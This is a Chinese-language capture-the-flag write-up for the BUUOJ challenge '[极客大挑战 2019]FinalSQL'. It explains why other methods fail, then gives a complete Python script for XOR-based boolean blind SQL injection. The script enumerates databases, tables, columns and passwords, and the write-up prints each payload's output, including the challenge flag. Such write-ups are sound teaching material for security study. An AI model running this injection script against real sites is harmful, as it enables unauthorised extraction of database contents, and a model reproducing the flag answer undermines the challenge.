[极客大挑战 2019]FinalSQL
一、题目分析
登录框测试,发现各种测试都是一样的反应。随机看了一下,几个紫色数字,点了后有回显。数字输入’后,报错,判断从这里开始注入测试。
1、页面没有数据库报错回显,且union被过滤,无法采用联合查询。
2、页面爆出的错误非数据库原始错误,无法使用报错注入。
3、时间盲注耗费时间,非必要一般不使用。
sql异或注入,经过尝试发现^符号未被过滤,(1^2=3)
-
首先可以根据1^0=1 1^1=0 来判断闭合方式(数字型还是字符型)。因为如果是字符型,不会执行^。
-
简单判断是数字型。
二、解题
import time
import requests
import string
url = "http://2b5f61cb-fce5-4e0f-9adb-82ccb1410e97.node4.buuoj.cn:81/search.php"
flag = ''
def payload(i, j):
# 数据库名字
sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
# 表名
# sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j)
# 列名
# sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)
# 查询flag
# sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)
data = {"id": sql}
r = requests.get(url, params=data,timeout=5)
time.sleep(0.04)
# print (r.url)
if "Click" in r.text:
res = 1
else:
res = 0
return res
def exp():
global flag
for i in range(1, 10000):
print(i, ':')
low = 31
high = 127
while low <= high:
mid = (low + high) // 2
res = payload(i, mid)
if res:
low = mid + 1
else:
high = mid - 1
f = int((low + high + 1)) // 2
if (f == 127 or f == 31):
break
# print (f)
flag += chr(f)
print(flag)
if __name__ == "__main__":
exp()
print('输出:', flag)1、 爆数据库名字 payload:
sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
输出: information_schema,mysql,performance_schema,test,geek
选数据库:geek
2、爆表名
sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j)
输出: F1naI1y,Flaaaaag
经结果测试,flag在 F1naI1y
3、爆列名
sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)
输出: id,username,password
4、查询flag
sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)
输出: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{f2408a9f-23a1-4b3b-abc1-27789081743d}